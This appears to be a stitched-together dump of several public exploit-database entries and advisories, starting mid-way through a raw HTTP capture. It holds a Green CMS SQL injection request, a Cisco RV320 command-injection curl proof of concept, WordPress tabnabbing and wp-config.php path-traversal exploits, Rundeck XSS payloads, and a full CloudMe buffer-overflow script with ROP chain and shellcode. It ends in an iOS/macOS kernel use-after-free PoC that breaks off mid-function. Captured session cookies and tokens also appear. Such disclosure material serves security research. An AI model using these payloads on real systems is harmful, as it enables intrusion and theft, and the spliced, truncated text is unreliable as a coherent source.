/TARGET/modules/system/admin.php_SystemCustomtag_ordersel=ASC; /TARGET/modules/system/admin.php_limitsel=15; /TARGET/modules/system/admin.php_SystemCustomtag_filtersel=default; /TARGET/modules/system/admin.php_SystemPages_sortsel=page_title; /TARGET/modules/system/admin.php_SystemPages_ordersel=ASC; /TARGET/modules/system/admin.php_SystemPages_filtersel=default; /TARGET/modules/content/admin/content.php_mod_content_Content_sortsel=content_title; /TARGET/modules/content/admin/content.php_mod_content_Content_ordersel=ASC; /TARGET/modules/content/admin/content.php_limitsel=15; /TARGET/modules/content/admin/content.php_mod_content_Content_filtersel=default; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548351649; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548355214; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPW1lZGlhJmE9ZG93bmZpbGUmaWQ9YVc1a1pYZ3VjR2h3; greencms_post_add1=x%9Cm%901k%C30%10%85%FFJ%D0%ECPI%B5-%5B%84%2C%1D2e%EAX%85%60YgG%E0%D8%22%3A%0D%A1%F4%BF%F7%9C+%C8%90%ED%DE%BB%EF%C1%BB%FBea%89xF%8F%130%CDL%AA%AD%94%265C%0F%26%95%83%1ALR%95l%0E7%80%F9%EB%F8%CD%8A%27%DF%2F3%C2%8C%94%D8%85%FD%0A%D6%DC%A4%AAU%AE+%01%A2%5ESe%BF3%1Fa%9F%23%DE%11-%B2%8A%D8a%8A%E4%84d%27%1F%2F%D9%C7%7BX%7BD%3F%8FT%28%9Bp%0DS%87o%16K+%8Fg%E9%9E%8C%E4%A2%DDr%B1%95%E5Fr%FD%D9jYg%E2%BA8%3Fxp%AFT%B5%E1Rs%A1%C5J%F5%1DR%AB%1F%2Az%2A%18v%E3C%D0W%5Ci%E9%2B%D6U47%5C%D1%7DV%01%3B%FD%FD%03%84%F0b%FF
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 24 Jan 2019 20:36:45 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPW1lZGlhJmE9ZG93bmZpbGUmaWQ9YVc1a1pYZ3VjR2h3; expires=Sat, 23-Feb-2019 20:36:45 GMT; Max-Age=2592000; path=/
Content-Disposition: attachment; filename="index.php"
Content-Length: 1031
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
# Exploit Title: Green CMS 2.x - SQL Injection
# Dork: N/A
# Date: 2019-01-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.greencms.net/
# Software Link: https://codeload.github.com/GreenCMS/GreenCMS/zip/beta
# Version: 2.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?m=admin&c=posts&a=index&cat=[SQL]
#
GET /[PATH]/index.php?m=admin&c=posts&a=index&cat=1%27))%20AND%201=BENCHMARK(100000000,MD5(0x456665))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9kv875ue1nd30aem1r11v7j4e1; scd39=d417d5511c72c08320; token=0d74f7745ef2ae866371f379887de13b; poll-20190124084438702=x; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1548345007; iCMS_iCMS_AUTH=23fead6b8NDfVdP8qVNpOPIPPUSpFJAso5x4PtfIdZ3nDi8o5wnWMSK3ChFfVeYSOHBG1oexoFRdZvpgU83b8Jf61eMlofgor_cA_M03jKYoXB3uVFTNACLmbQ; iCMS_USER_AUTH=219cbaebs-OpY5sJLvCCKTR3Dqt_oCHrxJW69eyU4H8ydfrP-oU2o_WTjmpI2rq_RlGfFU7z4khePqUAE_-e9BZoY7JqRmHEdQMwgIHvOFkLMuEm_MfWL5q_YjuZtjifggqF00S7XifyDwBoSSjLHF5_75serNlj4UzaM2Jx1UNECipmSjn0_LbHUxywdjrykOLebAf5KahIejKgbmJs25r1GkYT7kNAC4NCYzy8Bohr1Ty1LQpYq1D3Rid_82phOUD4q6sY3Ndaj8les5sAJvkEmXOwI8_y6lqBjZarygWlIh_O6b-nvRiE2cbaaMFsxJZZUlRvYU6RUWihB9yhFfg8UOZ9A41c_BdcyREjmQEGPPzBZnHBXZv4SbG-tj1gRr-L40L6EdGX-oKrbDC4oyt6vB0UzyzN9CZP5ZKWn8GzFGJAMWF7kFjPD_upiZiBd-rHyPyCZb0Tsr6920eRpm5ZPLiJ-cfKsR0Gm1s5vvsYO9BsTG1FogUhQwzjHbT4lIO3lUcpvxYSSc9wbE3R1izg2wME6ATQ6PEnszM; iCMS_userid=32dfb608S9QlPEJd2BZY81z70jgnBnJldGAo3OuRdbLJJbk_Qw; iCMS_nickname=32dfb608S9QlPEJd2BZY81b63296UnYxe2Yv3riRc-edc-xqFRw; ICMSSESSION=pahh0r0jsr9gre9e0vn1jmqp23; /PATH/modules/system/admin.php_SystemCustomtag_sortsel=name; /PATH/modules/system/admin.php_SystemCustomtag_ordersel=ASC; /PATH/modules/system/admin.php_limitsel=15; /PATH/modules/system/admin.php_SystemCustomtag_filtersel=default; /PATH/modules/system/admin.php_SystemPages_sortsel=page_title; /PATH/modules/system/admin.php_SystemPages_ordersel=ASC; /PATH/modules/system/admin.php_SystemPages_filtersel=default; /PATH/modules/content/admin/content.php_mod_content_Content_sortsel=content_title; /PATH/modules/content/admin/content.php_mod_content_Content_ordersel=ASC; /PATH/modules/content/admin/content.php_limitsel=15; /PATH/modules/content/admin/content.php_mod_content_Content_filtersel=default; Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548351649; Hm_lpvt_48659a4ab85f1bcebb11d3dd3ecb6760=1548355214; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9aW5kZXgmY2F0PTElMjcpKSUyMEFORCUyMDE9QkVOQ0hNQVJLKDEwMDAwMDAwMCxNRDUoRWZlKSktLSUyMC0%3D; greencms_post_add1=x%9Cm%901k%C30%10%85%FFJ%D0%ECPI%B5-%5B%84%2C%1D2e%EAX%85%60YgG%E0%D8%22%3A%0D%A1%F4%BF%F7%9C+%C8%90%ED%DE%BB%EF%C1%BB%FBea%89xF%8F%130%CDL%AA%AD%94%265C%0F%26%95%83%1ALR%95l%0E7%80%F9%EB%F8%CD%8A%27%DF%2F3%C2%8C%94%D8%85%FD%0A%D6%DC%A4%AAU%AE+%01%A2%5ESe%BF3%1Fa%9F%23%DE%11-%B2%8A%D8a%8A%E4%84d%27%1F%2F%D9%C7%7BX%7BD%3F%8FT%28%9Bp%0DS%87o%16K+%8Fg%E9%9E%8C%E4%A2%DDr%B1%95%E5Fr%FD%D9jYg%E2%BA8%3Fxp%AFT%B5%E1Rs%A1%C5J%F5%1DR%AB%1F%2Az%2A%18v%E3C%D0W%5Ci%E9%2B%D6U47%5C%D1%7DV%01%3B%FD%FD%03%84%F0b%FF
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 24 Jan 2019 22:36:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: GreenCMS Community Version
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9leHBsb2l0ZGIvZ3JlZW5jbXMtYmV0YS9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9aW5kZXgmY2F0PTElMjcpKSUyMEFORCUyMDE9QkVOQ0hNQVJLKDEwMDAwMDAwMCxNRDUoMHg0NTY2NjUpKS0tJTIwLQ%3D%3D; expires=Sat, 23-Feb-2019 19:14:36 GMT; Max-Age=2592000; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=
RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router.
Details
=======
Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 and later
Fixed Versions: since 1.4.2.20
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652
Introduction
============
"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal
choice for any small office or small business looking for performance,
security, and reliability in its network."
(from the Cisco RV320 product page [1])
More Details
============
The router's web interface enables users to generate new X.509
certificates directly on the device. A user may enter typical
configuration parameters required for the certificate, such as
organisation, the common name and so on. In order to generate the
certificate, the device uses the command-line program openssl [2]. The
device's firmware uses the following format string to assemble the
openssl command:
------------------------------------------------------------------------
openssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1
------------------------------------------------------------------------
Although the web interface filters certain special characters via
JavaScript, there is actually no input filtering, escaping or encoding
happening on the server. This allows attackers to inject arbitrary
commands.
Proof of Concept
================
Even though all components of the subject seem to be vulnerable to
command injection, the following example uses the common name to trigger
a ping command:
------------------------------------------------------------------------
a'$(ping -c 4 192.168.1.2)'b
------------------------------------------------------------------------
The following HTTP POST request invokes the certificate generator
function and triggers the command injection. It requires a valid session
cookie for the device's web interface.
------------------------------------------------------------------------
curl -s -b "$COOKIE" \
--data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\
"&organization=A&organization_unit=A&email=ab%40example.com"\
"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\
"SelectSubject_s=1" \
--data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" \
"http://192.168.1.1/certificate_handle2.htm?type=4"
------------------------------------------------------------------------
Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at 192.168.1.2.
Workaround
==========
Prevent untrusted users from using the router's web interface.
Fix
===
Install firmware version 1.4.2.20 (or later) on the router.
Security Risk
=============
The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials to the web
interface, this vulnerability is only rated as a medium risk.
Timeline
========
2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-23 Advisory published
References
==========
[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://wiki.openssl.org/index.php/Command_Line_Utilities
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
# Exploit Title: Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
# Date: 01-22-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://kaine.pl/
# Softwae Link: https://wordpress.org/plugins/wise-chat/
# Version: Up to V2.6.3
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : 2019-6780.
# Plugin description:
Wise Chat is a leading chat plugin that helps to build a social network and to increase user engagement on your website by providing the possibility to exchange real time messages in chat rooms. The plugin is easily installable and extremely configurable. Its features list is growing all the time.
# POC
Send following URL on wise chat "http://mtk911.cf/OR/" which has the following html
<html>
<script>
if (window.opener) window.opener.parent.location.replace('http://mtk911.cf/');
if (window.parent != window) window.parent.location.replace('http://mtk911.cf/');
</script>
Open Redirect TEST
</html>
when you click on that user. This opens in a new tab, and the parent tab is silently redirected to my website without asking the user.
#Technical Details & Impact:
In a real life example, this would redirect to a phishing site to try gain credentials for users.
# References:
https://wordpress.org/plugins/wise-chat/#developers
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk/src/rendering/filters/post/WiseChatLinksPostFilter.php
https://plugins.trac.wordpress.org/changeset/2016929/wise-chat/trunk#file6
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6780
Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File
Download
Google Dork: N/A
Date: 25.01.2019
Vendor Homepage:
https://web-dorado.com/products/wordpress-ad-manager-wd.html
Software: https://wordpress.org/plugins/ad-manager-wd
Version: 1.0.11
Tested on: Win7 x64,
Exploit Author: 41!kh4224rDz
Author Mail : scanweb18@gmail.com
Vulnerability:
wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php
30/ if (isset($_GET['export']) && $_GET['export'] == 'export_csv')
97/ $path = $_GET['path'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0,
pre-check=0');
header('Pragma: public');
header('Content-Type: text/csv; charset=utf-8');
header('Content-Disposition: attachment; filename=' .
basename($path));
readfile($path);
Arbitrary File Download/Exploit :
http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php
# Exploit Title: Rundeck Community Edition before 3.0.13 Multiple Stored
XSS
# Vendor Homepage: https://www.rundeck.com/open-source
# Software Link: https://docs.rundeck.com/downloads.html
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# Platform: Java
# CVE: CVE-2019-6804
1. Description:
Cross-Site Scripting issues affecting multiple fields in the workflow
module under job edit form by injecting javascript code in the Arguments,
Invocation String, and File Extension field, the input from these fields
are rendered in the Execution Preview which is the sink of this
vulnerability.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6804
2. Proof of Concept:
Vulnerable Endpoints / Systems
http://{Rundeck_hostname}/project/{Jobname}/job/edit/{Job_ID}
Steps to Reproduce:
Login to Rundeck Server with valid credentials.
1. Navigate to any project in the instance.
2. Navigate to the jobs module
3. Select a job
4. From the right hand side drop down menu, select edit this job
5. Navigate to Workflow module
6. Scroll down to arguments field
7. Enter the following payload: <img/src="x"onerror=alert(19)
8. The same payload can be entered in the Advanced mode in the same module
in two other fields "Invokation String" and "File Extension"
9. Observe the payload getting executed in the "Execution Preview"
3. Solution:
The issue is now patched by the vendor in version 3.0.13
https://docs.rundeck.com/docs/history/version-3.0.13.html
https://github.com/rundeck/rundeck/issues/4406
--
Best Regards,
Ishaq Mohammed
https://about.me/security-prince
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact:https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218
import socket
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
0x690398a8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61bdd7f5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x68aef542, # XCHG EAX,ESI # RETN [Qt5Core.dll]
0x68bfe66b, # POP EBP # RETN [Qt5Core.dll]
0x68f82223, # & jmp esp [Qt5Core.dll]
0x6d9f7736, # POP EDX # RETN [Qt5Sql.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x61e870e0, # POP EBX # RETN [Qt5Gui.dll]
0xffffffff, #
0x6204f463, # INC EBX # RETN [Qt5Gui.dll]
0x68f8063c, # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
0x61ec44ae, # POP EDX # RETN [Qt5Gui.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x61e2a807, # POP ECX # RETN [Qt5Gui.dll]
0x6eb573c9, # &Writable location [libgcc_s_dw2-1.dll]
0x61e85d66, # POP EDI # RETN [Qt5Gui.dll]
0x6d9e431c, # RETN (ROP NOP) [Qt5Sql.dll]
0x61ba8ce5, # POP EAX # RETN [Qt5Gui.dll]
0x90909090, # nop
0x61b6b8d0, # PUSHAD # RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
target="127.0.0.1"
junk="A"*1052
eip = "\xfc\x57\xea\x61" # 0x61ea57fc
nops = "\x90\x90\x90\x90"
egg64 = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xea\xb8"
"\x77\x30\x30\x74" # tag w00t
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
#Shellcode calc.exe
shellcode = ""
shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
payload = junk+ eip + nops * 3 + rop_chain + nops*4 + egg64 + nops*4 + "w00tw00t" + shellcode
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
except:
print "Crashed!"
/*
* voucher_swap-poc.c
* Brandon Azad
*/
#if 0
iOS/macOS: task_swap_mach_voucher() does not respect MIG semantics leading to use-after-free
The dangers of not obeying MIG semantics have been well documented: see issues 926 (CVE-2016-7612),
954 (CVE-2016-7633), 1417 (CVE-2017-13861, async_wake), 1520 (CVE-2018-4139), 1529 (CVE-2018-4206),
and 1629 (no CVE), as well as CVE-2018-4280 (blanket). However, despite numerous fixes and
mitigations, MIG issues persist and offer incredibly powerful exploit primitives. Part of the
problem is that MIG semantics are complicated and unintuitive and do not align well with the
kernel's abstractions.
Consider the MIG routine task_swap_mach_voucher():
routine task_swap_mach_voucher(
task : task_t;
new_voucher : ipc_voucher_t;
inout old_voucher : ipc_voucher_t);
Here's the (placeholder) implementation:
kern_return_t
task_swap_mach_voucher(
task_t task,
ipc_voucher_t new_voucher,
ipc_voucher_t *in_out_old_voucher)
{
if (TASK_NULL == task)
return KERN_INVALID_TASK;
*in_out_old_voucher = new_voucher;
return KERN_SUCCESS;
}
The correctness of this implementation depends on exactly how MIG ownership semantics are defined
for each of these parameters.
When dealing with Mach ports and out-of-line memory, ownership follows the traditional rules (the
ones violated by the bugs above):
1. All Mach ports (except the first) passed as input parameters are owned by the service routine if
and only if the service routine returns success. If the service routine returns failure then MIG
will deallocate the ports.
2. All out-of-line memory regions passed as input parameters are owned by the service routine if
and only if the service routine returns success. If the service routine returns failure then MIG
will deallocate all out-of-line memory.
But this is only part of the picture. There are more rules for other types of objects:
3. All objects with defined MIG translations that are passed as input-only parameters are borrowed
by the service routine. For reference-counted objects, this means that the service routine is
not given a reference, and hence a reference must be added if the service routine intends to
keep the object around.
4. All objects with defined MIG translations that are returned in output parameters must be owned
by the output parameter. For reference-counted objects, this means that output parameters
consume a reference on the object.
And most unintuitive of all:
5. All objects with defined MIG translations that are passed as input in input-output parameters
are owned (not borrowed!) by the service routine. This means that the service routine must
consume the input object's reference.
Having defined MIG translations means that there is an automatic conversion defined between the
object type and its Mach port representation. A task port is one example of such a type: you can
convert a task port to the underlying task object using convert_port_to_task(), and you can convert
a task to its corresponding port using convert_task_to_port().
Getting back to Mach vouchers, this is the MIG definition of ipc_voucher_t:
type ipc_voucher_t = mach_port_t
intran: ipc_voucher_t convert_port_to_voucher(mach_port_t)
outtran: mach_port_t convert_voucher_to_port(ipc_voucher_t)
destructor: ipc_voucher_release(ipc_voucher_t)
;
This definition means that MIG will automatically convert the voucher port input parameters to
ipc_voucher_t objects using convert_port_to_voucher(), convert the ipc_voucher_t output parameters
into ports using convert_voucher_to_port(), and discard any extra references using
ipc_voucher_release(). Note that convert_port_to_voucher() produces a voucher reference without
consuming a port reference, while convert_voucher_to_port() consumes a voucher reference and
produces a port reference.
To confirm our understanding of the MIG semantics outlined above, we can look at the function
_Xtask_swap_mach_voucher(), which is generated by MIG during the build process:
mig_internal novalue _Xtask_swap_mach_voucher
(mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
...
kern_return_t RetCode;
task_t task;
ipc_voucher_t new_voucher;
ipc_voucher_t old_voucher;
...
task = convert_port_to_task(In0P->Head.msgh_request_port);
new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
ipc_voucher_release(new_voucher);
task_deallocate(task);
if (RetCode != KERN_SUCCESS) {
MIG_RETURN_ERROR(OutP, RetCode);
}
...
if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
...
OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));
OutP->msgh_body.msgh_descriptor_count = 1;
}
Tracing where each of the references are going, we can deduce that:
1. The new_voucher parameter is deallocated with ipc_voucher_release() after invoking the service
routine, so it is not owned by task_swap_mach_voucher(). In other words,
task_swap_mach_voucher() is not given a reference on new_voucher.
2. The old_voucher parameter has a reference on it before it gets overwritten by
task_swap_mach_voucher(), which means task_swap_mach_voucher() is being given a reference on the
input value of old_voucher.
3. The value returned by task_swap_mach_voucher() in old_voucher is passed to
convert_voucher_to_port(), which consumes a reference on the voucher. Thus,
task_swap_mach_voucher() is giving _Xtask_swap_mach_voucher() a reference on the output value of
old_voucher.
Finally, looking back at the implementation of task_swap_mach_voucher(), we can see that none of
these rules are being followed:
kern_return_t
task_swap_mach_voucher(
task_t task,
ipc_voucher_t new_voucher,
ipc_voucher_t *in_out_old_voucher)
{
if (TASK_NULL == task)
return KERN_INVALID_TASK;
*in_out_old_voucher = new_voucher;
return KERN_SUCCESS;
}
This results in two separate reference counting issues:
1. By overwriting the value of in_out_old_voucher without first releasing the reference, we are
leaking a reference on the input value of old_voucher.
2. By assigning the value of new_voucher to in_out_old_voucher without adding a reference, we are
consuming a reference we don't own, leading to an over-release of new_voucher.
Now, Apple has previously added a mitigation to make reference count leaks on Mach ports
non-exploitable by having the reference count saturate before it overflows. However, this
mitigation is not relevant here because we're leaking a reference on the actual ipc_voucher_t, not
on the voucher port that represents the voucher. And looking at the implementation of
ipc_voucher_reference() and ipc_voucher_release() (as of macOS 10.13.6), it's clear that the
voucher reference count is tracked independently of the port reference count:
void
ipc_voucher_reference(ipc_voucher_t voucher)
{
iv_refs_t refs;
if (IPC_VOUCHER_NULL == voucher)
return;
refs = iv_reference(voucher);
assert(1 < refs);
}
void
ipc_voucher_release(ipc_voucher_t voucher)
{
if (IPC_VOUCHER_NULL != voucher)
iv_release(voucher);
}
static inline iv_refs_t
iv_reference(ipc_voucher_t iv)
{
iv_refs_t refs;
refs = hw_atomic_add(&iv->iv_refs, 1);
return refs;
}
static inline void
iv_release(ipc_voucher_t iv)
{
iv_refs_t refs;
assert(0 < iv->iv_refs);
refs = hw_atomic_sub(&iv->iv_refs, 1);
if (0 == refs)
iv_dealloc(iv, TRUE);
}
(The assert()s are not live on production builds.)
This vulnerability can be triggered without crossing any privilege/MACF checks, so it should be
reachable within every process and every sandbox.
On iOS 11 and macOS 10.13, both the over-reference and over-release vulnerabilities can be
independently exploited to free an ipc_voucher_t while it is still in use. On these platforms these
are incredibly powerful vulnerabilities, since they also let us receive a send right to a
freed-and-reallocated Mach port back in userspace. For some examples of why this is dangerous, see
Ian's thoughts in issue 941: <https://bugs.chromium.org/p/project-zero/issues/detail?id=941#c3>.
As of iOS 12 and macOS 10.14, the voucher reference count is checked for underflow and overflow,
which does make the over-reference vulnerability non-exploitable. However, the over-release
vulnerability is still fully exploitable, and probably can still be used as a single,
direct-to-kernel bug from any process.
Additionally, while this report is of a single bug, it should indicate a wider problem with the
complexity of obeying MIG semantics. It might be worth reviewing other edge cases of MIG semantics
not covered by previous bugs.
(There's a variant of the over-reference vulnerability in thread_swap_mach_voucher(), but it is no
longer exploitable as of iOS 12.)
This proof-of-concept demonstrates the vulnerability by creating a Mach voucher, saving a reference
to it in the current thread's ith_voucher field via thread_set_mach_voucher(), decreasing the
reference count back to 1 using task_swap_mach_voucher(), and then freeing the voucher by
deallocating the voucher port in userspace. This leaves a dangling pointer to the freed voucher's
memory in ith_voucher, which can subsequently be accessed with a call to thread_get_mach_voucher(),
triggering a panic.
Tested on macOS 10.13.6 (17G4015), macOS 10.14.2, and iOS 12.1 (16B92).
#endif
#include <assert.h>
#include <mach/mach.h>
#include <stdio.h>
#include <unistd.h>
// Stash the host port for create_voucher().
mach_port_t host;
/*
* create_voucher
*
* Description:
* Create a Mach voucher. If id is unique, then this will be a unique voucher (until another
* call to this function with the same id).
*
* A Mach voucher port for the voucher is returned. The voucher has 1 reference, while the
* voucher port has 2 references and 1 send right.
*/
static mach_port_t
create_voucher(uint64_t id) {
assert(host != MACH_PORT_NULL);
mach_port_t voucher = MACH_PORT_NULL;
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wgnu-variable-sized-type-not-at-end"
struct __attribute__((packed)) {
mach_voucher_attr_recipe_data_t user_data_recipe;
uint64_t user_data_content[2];
} recipes = {};
#pragma clang diagnostic pop
recipes.user_data_recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
recipes.user_data_recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
recipes.user_data_recipe.content_size = sizeof(recipes.user_data_content);
recipes.user_data_content[0] = getpid();
recipes.user_data_content[1] = id;
kern_return_t kr = host_create_mach_voucher(
host,
(mach_voucher_attr_raw_recipe_array_t) &recipes,
sizeof(recipes),
&voucher);
